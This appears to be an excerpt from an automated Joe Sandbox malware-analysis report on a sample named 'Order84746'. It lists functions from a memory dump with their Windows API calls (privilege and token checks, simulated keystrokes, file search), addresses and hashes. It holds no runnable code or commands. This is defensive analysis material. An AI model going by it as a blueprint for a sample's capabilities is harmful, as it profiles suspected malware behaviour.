                          • String ID:
                          • API String ID: 33631002-0
                          • Opcode ID: a0f8e42a9ad4faac8248a0301324e122e58516cfe1aa139d391cddc8b163ad24
                          • Instruction ID: 84c3a1cc74d95a046f92f7e659411ac55d4c4c843019a8a58c9849e1f7bfa086
                          • Opcode Fuzzy Hash: a0f8e42a9ad4faac8248a0301324e122e58516cfe1aa139d391cddc8b163ad24
                          • Instruction Fuzzy Hash: 3811A5B1E15228BEE7108BA8EC45FAF77BCEB09754F004555F911E7190C2B49E0487E1
                          Function 009271FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00927223
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0092723A
                          • FreeSid.ADVAPI32(?), ref: 0092724A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          • Opcode ID: 8eef10b66e2cce864191b6a6c78470c3a2413227bd6c71ced1732edbb791903a
                          • Instruction ID: b560a24f166bbc15de775a1c3d91310464b05fcbda97551c59ccf6d741863867
                          • Opcode Fuzzy Hash: 8eef10b66e2cce864191b6a6c78470c3a2413227bd6c71ced1732edbb791903a
                          • Instruction Fuzzy Hash: 63F01D76E15209FFDF04DFE4DD99AEEBBBCEF08201F104469E612E2191E2709A449B10
                          Function 008FB385 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • GetParent.USER32(?), ref: 0095E5B2
                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,008FB1E8,?,?,?,00000006,?), ref: 0095E62C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LongWindow$DialogNtdllParentProc_
                          • String ID:
                          • API String ID: 314495775-0
                          • Opcode ID: d7c3394c75698eb9bc139d6c39d8841a997fc5f1f6d96ee8ac5651f8f262745c
                          • Instruction ID: 6fc51e38bca3acfabe9c151b780ad0fde0b4ca8b0114a96ff84d467679364804
                          • Opcode Fuzzy Hash: d7c3394c75698eb9bc139d6c39d8841a997fc5f1f6d96ee8ac5651f8f262745c
                          • Instruction Fuzzy Hash: 55217134645118AFCB248F38C8859B93BD6FF0A368F184256FA298B3E1D7319E15D751
                          Function 0092F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0092F599
                          • FindClose.KERNEL32(00000000), ref: 0092F5C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: 2f97e9d9daa0fcbf722b7243b32d6e2636ce5a20fc0ff7e1410ad11e2b00a390
                          • Instruction ID: c95511e714375bbb7c3ebe80dc9960236558966f807e53e9939602c73a83c78d
                          • Opcode Fuzzy Hash: 2f97e9d9daa0fcbf722b7243b32d6e2636ce5a20fc0ff7e1410ad11e2b00a390
                          • Instruction Fuzzy Hash: BB11AD726046049FD710EF29D845A2EB3E8FF89324F01892EF9A9D7291CB74A9008B91
                          Function 0094F2D0 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0095E44F,?,?,?), ref: 0094F344
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0094F32A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LongWindow$DialogMessageNtdllProc_Send
                          • String ID:
                          • API String ID: 1273190321-0
                          • Opcode ID: 71ad2219b4d866083c57f3d0679ce5339a128b8588d9d79fafc26450523dadb6
                          • Instruction ID: 6f3189f2894edef3b152755f2427779ef25c2e35c40871498b4fa82eae1aa213
                          • Opcode Fuzzy Hash: 71ad2219b4d866083c57f3d0679ce5339a128b8588d9d79fafc26450523dadb6
                          • Instruction Fuzzy Hash: 0001D431205215AFCF219F14DC54F7A7BAAFF86364F184568F9154B2E0C771AC12EB91
                          Function 0094F689 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 0094F6AC
                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0095E52B,?,?,?,?,?), ref: 0094F6D5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClientDialogNtdllProc_Screen
                          • String ID:
                          • API String ID: 3420055661-0
                          • Opcode ID: adff48b4cad7c201e3ef22ee74ab564ee131cd8f61ad9f3454246743609bec22
                          • Instruction ID: 2cd1c899b09d7e67d415e1c69318d71154c3dac66c01f9e0fff0320000b7bbe1
                          • Opcode Fuzzy Hash: adff48b4cad7c201e3ef22ee74ab564ee131cd8f61ad9f3454246743609bec22
                          • Instruction Fuzzy Hash: 38F03A72911118FFEF048F85DC099AE7FB8FF48311F14401AF912A2160D7B1AA51EBA0
                          Function 0092CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0093BE6A,?,?,00000000,?), ref: 0092CEA7
                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0093BE6A,?,?,00000000,?), ref: 0092CEB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 730ab0f9fd78b750a9e4762ab235b7402facb30699c4e8b0435058e3d4c8ccf7
                          • Instruction ID: 8f67605f16170d40603c1117a8e27c7c445fb00159d57999f5eed8d90e16b985
                          • Opcode Fuzzy Hash: 730ab0f9fd78b750a9e4762ab235b7402facb30699c4e8b0435058e3d4c8ccf7
                          • Instruction Fuzzy Hash: 66F0EC71500229ABEB20ABA4DC48FEA336CFF083A0F008129F829D2180C6709A00CBA0
                          Function 0092411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00924153
                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00924166
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          • Opcode ID: 47bd14aa90524c7739780530decfaf0e1194e9b6724cc3a694e7fe98db2d38df
                          • Instruction ID: fc43ad4fbc3cb6cd6dffc79479c14b664feb21f0f4c0e51447ccd0a54713507e
                          • Opcode Fuzzy Hash: 47bd14aa90524c7739780530decfaf0e1194e9b6724cc3a694e7fe98db2d38df
                          • Instruction Fuzzy Hash: 22F09A7091834DAFDB058FA0C805BBE7FB4EF14305F00840AF966AA196D7B9C612DFA4
                          Function 0091AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0091ACC0), ref: 0091AB99
                          • CloseHandle.KERNEL32(?,?,0091ACC0), ref: 0091ABAB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: d9c9f43b422edd47181cd0c6b77b91db581d8a279246bb13f7c1c8d2cadd95f1
                          • Instruction ID: 42377f9cb74e0c33bcfc5b3d43fcd5aa68c4d4b1835ddb0664b9abf6400526f8
                          • Opcode Fuzzy Hash: d9c9f43b422edd47181cd0c6b77b91db581d8a279246bb13f7c1c8d2cadd95f1
                          • Instruction Fuzzy Hash: CEE08631014510AFE7212F24EC04D7777EDEF04320710842DF559C0431C7625C90DB50
                          Function 0094F7C3 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 0094F7CB
                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0095E4AA,?,?,?,?), ref: 0094F7F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 4eb3207b2f3eb3b1767e6da807618ea2b49ff04c3be7404141f8f5c1c5523ea9
                          • Instruction ID: 8425bf23883de1681b1a1f1fc2a5a88eb22eee5bced395089eb6c54b4a5d644e
                          • Opcode Fuzzy Hash: 4eb3207b2f3eb3b1767e6da807618ea2b49ff04c3be7404141f8f5c1c5523ea9
                          • Instruction Fuzzy Hash: F0E0C230208219BBEB140F09DC2AFB93B18EB04B50F108529F96B984E0D7F49890E260
                          Function 009081AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00906DB3,-0000031A,?,?,00000001), ref: 009081B1
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009081BA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 2cd6a735a57a51db211f6640c9c96e343ac919e53c7821a66eb4f249743d263f
                          • Instruction ID: 03f6f6a160bda8e2bfd883715fc90ed31a93511cf23011f1fe3579172822ff7e
                          • Opcode Fuzzy Hash: 2cd6a735a57a51db211f6640c9c96e343ac919e53c7821a66eb4f249743d263f
                          • Instruction Fuzzy Hash: C3B0923165A608ABDB002BA2EC09F587F68EB0865AF004018F62D442619BB25510AA96
                          Function 008E77B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: cf6d5c4f0353e701c901152dc4528d47017edbb5e1085e9e2e9f41a69f837a12
                          • Instruction ID: d50f241cc2904084e3bd7555db87e97df8f81efb3d4ab510d07b2b27bf9585b4
                          • Opcode Fuzzy Hash: cf6d5c4f0353e701c901152dc4528d47017edbb5e1085e9e2e9f41a69f837a12
                          • Instruction Fuzzy Hash: BAA24870E04259CFDB24CF69C8806ADBBB1FF49314F2581A9E859EB391D7349E81DB90
                          Function 008F3B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception
                          • String ID: @
                          • API String ID: 3728558374-2766056989
                          • Opcode ID: 4da2f8cc8faadce8d5f264968a1eccb54bf033e85dd5d9af82e2e4c1802f8e57
                          • Instruction ID: b5ae2ed53c231cace5f4a463eb396fc918d06afc3a55095f9fcca032f5752bea
                          • Opcode Fuzzy Hash: 4da2f8cc8faadce8d5f264968a1eccb54bf033e85dd5d9af82e2e4c1802f8e57
                          • Instruction Fuzzy Hash: 23727C71A0420DAFCB14DFA8D481ABEB7B5FF48304F14805AEE15EB291DB35AE45CB91
                          Function 0090D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b2209609a74654bc2aad952fc32dd2866f68787dd26bdb1f6f1e7c13dd814ee
                          • Instruction ID: 4e7383f24e69c3460609843abcc6cbdddb6362e585acb075c5cce01c92e45bb4
                          • Opcode Fuzzy Hash: 3b2209609a74654bc2aad952fc32dd2866f68787dd26bdb1f6f1e7c13dd814ee
                          • Instruction Fuzzy Hash: 73320322D3AF014DD7279634D922335A28CEFB73D5F15D727E829B5AAAEB29C4C35100
                          Function 008E96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __itow__swprintf
                          • String ID:
                          • API String ID: 674341424-0
                          • Opcode ID: 33502ccc1cade14207883327a7ef299fc599b12db5bf7cd93dfe881e75a8c6bc
                          • Instruction ID: f0613f2e823030cf682ed43e7a3a9be9148da40de74eb930d6bceaff3ae3ff2f
                          • Opcode Fuzzy Hash: 33502ccc1cade14207883327a7ef299fc599b12db5bf7cd93dfe881e75a8c6bc
                          • Instruction Fuzzy Hash: 072299B16083519FC724DF29C880B6BB7E4FF85314F10492DF99A97291DBB1E948CB92
                          Function 0091038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5916e76cd40e2a090b672ebe7b1ded04fac50ffa39a331504e9cff1e7115ba23
                          • Instruction ID: ff5b71721474309725b1041de696f54b38ed81e6edd786fd7e5171a83dab9cfe
                          • Opcode Fuzzy Hash: 5916e76cd40e2a090b672ebe7b1ded04fac50ffa39a331504e9cff1e7115ba23
                          • Instruction Fuzzy Hash: 36B1F021E3AF414DD26396398831336B65CAFBB2D5B92D71BFC1E70D62EB6285C35180
                          Function 0092B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • __time64.LIBCMT ref: 0092B6DF
                            • Part of subcall function 0090344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0092BDC3,00000000,?,?,?,?,0092BF70,00000000,?), ref: 00903453
                            • Part of subcall function 0090344A: __aulldiv.LIBCMT ref: 00903473
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Time$FileSystem__aulldiv__time64
                          • String ID:
                          • API String ID: 2893107130-0
